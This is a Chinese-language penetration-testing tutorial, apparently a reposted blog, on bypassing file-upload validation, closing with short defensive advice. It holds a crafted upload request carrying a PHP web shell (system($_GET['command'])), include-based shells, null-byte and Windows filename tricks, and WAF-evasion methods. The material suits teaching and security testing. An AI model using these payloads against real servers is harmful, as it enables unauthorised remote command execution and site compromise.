文件上传漏洞(绕过姿势)

0X00 前言

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。

文件上传校验姿势

  • 客户端javascript校验(一般只校验后缀名)
  • 服务端校验
    • 文件头content-type字段校验(image/gif)
    • 文件内容头校验(GIF89a)
    • 后缀名黑名单校验
    • 后缀名白名单校验
    • WAF设备校验(根据不同的WAF产品而定)

1.客户端校验

  一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。
  判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包。

2.服务端校验

2.1 content-type字段校验

  这里以PHP代码为例,模拟web服务器端的校验代码

<?php
        if($_FILES['userfile']['type'] != "image/gif")  #这里对上传的文件类型进行判断,如果不是image/gif类型便返回错误。
                {   
                 echo "Sorry, we only allow uploading GIF images";
                 exit;
                 }
         $uploaddir = 'uploads/';
         $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
         if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
             {
                 echo "File is valid, and was successfully uploaded.\n";
                } else {
                     echo "File uploading failed.\n";
    }
     ?>

可以看到代码对上传文件的文件类型进行了判断,如果不是图片类型,返回错误。

2.2 文件头校验

  可以通过自己写正则匹配,判断文件头内容是否符合要求,这里举几个常见的文件头对应关系:
(1) .JPEG;.JPE;.JPG,”Exif” “JFIF”等
(2) .gif,”GIF89a”
(3) .zip,”Zip Compressed”
(4) .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”

文件上传绕过校验姿势

  • 客户端绕过(抓包改包)
  • 服务端绕过
    • 文件类型
    • 文件头
    • 文件后缀名
  • 配合文件包含漏洞绕过
  • 配合服务器解析漏洞绕过
  • CMS、编辑器漏洞绕过
  • 配合操作系统文件命名规则绕过
  • 配合其他规则绕过
  • WAF绕过

1.客户端绕过

  可以利用burp抓包改包,先上传一个gif类型的木马,然后通过burp将其改为asp/php/jsp后缀名即可。

2.服务端绕过

2.1 文件类型绕过

  我们可以通过抓包,将content-type字段改为image/gif

POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/gif (原为 Content-Type: text/plain)
<?php system($_GET['command']);?>
--xYzZY-

2.2 文件头绕过

  在木马内容基础上再加了一些文件信息,有点像下面的结构
GIF89a

2.3 文件后缀名绕过

前提:黑名单校验
黑名单检测:一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件。

绕过方法:
(1)找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
(2)可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表:
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee

3.配合文件包含漏洞

前提:校验规则只校验当文件后缀名为asp/php/jsp的文件内容是否为木马。

绕过方式:(这里拿php为例,此漏洞主要存在于PHP中)
(1)先上传一个内容为木马的txt后缀文件,因为后缀名的关系没有检验内容;
(2)然后再上传一个.php的文件,内容为

<?php Include(“上传的txt文件路径”);?>

此时,这个php文件就会去引用txt文件的内容,从而绕过校验,下面列举包含的语法:

#PHP    
<?php Include("上传的txt文件路径");?> 
#ASP    
<!--#include file="上传的txt文件路径" -->
#JSP    
<jsp:inclde page="上传的txt文件路径"/>
or  
<%@include file="上传的txt文件路径"%>

4.配合服务器解析漏洞

如配合Apache解析漏洞,test.php.rar,会被Apache解析为test.php。
(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。

5.配合操作系统文件命令规则

(1)上传不符合windows文件命名规则的文件名

    test.asp.
  test.asp(空格)
  test.php:1.jpg
  test.php::$DATA
  shell.php::$DATA…….

会被windows系统自动去掉不符合规则符号后面的内容。
(2)linux下后缀名大小写
在linux下,如果上传php不被解析,可以试试上传pHp后缀的文件名。

6.CMS、编辑器漏洞

(1)CMS漏洞:比如说JCMS等存在的漏洞,可以针对不同CMS存在的上传漏洞进行绕过。
(2)编辑器漏洞:比如FCK,ewebeditor等,可以针对编辑器的漏洞进行绕过。
这里只是听说过,没有做更多的了解,详细了解后,再总结。

7.配合其他规则

(1)0x00截断:基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候

test.php(0x00).jpg
test.php%00.jpg

  路径/upload/1.php(0x00),文件名1.jpg,结合/upload/1.php(0x00)/1.jpg
伪代码演示:

name= getname(httprequest) //假如这时候获取到的文件名是 help.asp.jpg(asp 后面为 0x00)
type =gettype(name)        //而在 gettype()函数里处理方式是从后往前扫描扩展名,所以判断为 jpg
if(type == jpg)
   SaveFileToPath(UploadPath.name, name)   //但在这里却是以 0x00 作为文件名截断
//最后以 help.asp 存入路径里

这种利用办法只在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断。

8.WAF绕过

8.1 垃圾数据

有些主机WAF软件为了不影响web服务器的性能,会对校验的用户数据设置大小上限,比如1M。此种情况可以构造一个大文件,前面1M的内容为垃圾内容,后面才是真正的木马内容,便可以绕过WAF对文件内容的校验;可以将垃圾数据加上Content-Disposition参数后面,参数内容过长,可能会导致waf检测出错。

8.2 filename

针对早期版本安全狗,可以多加一个filename
或者将filename换位置,在IIS6.0下如果我们换一种书写方式,把filename放在其他地方:

8.3 POST/GET

有些WAF的规则是:如果数据包为POST类型,则校验数据包内容。
此种情况可以上传一个POST型的数据包,抓包将POST改为GET。

8.5 利用waf本身缺陷

删除实体里面的Conten-Type字段
第一种是删除Content整行,第二种是删除C后面的字符。删除掉ontent-Type: image/jpeg只留下c,将.php加c后面即可,但是要注意额,双引号要跟着c.php。

正常包:Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
构造包:Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"

修改Content-Disposition字段值的大小写

文件重命名绕过

如果web程序会将filename除了扩展名的那段重命名的话,那么还可以构造更多的点、符号等等。

文件校验的几点建议

  • 文件扩展名服务端白名单校验。
  • 文件内容服务端校验。
  • 上传文件重命名。
  • 隐藏上传文件路径。

      以上几点,可以防御绝大多数上传漏洞,但是需要跟服务器容器结合起来。如果解析漏洞依然存在,那么没有绝对的安全。


原文链接文件上传漏洞(绕过姿势)

没有更多推荐了,返回首页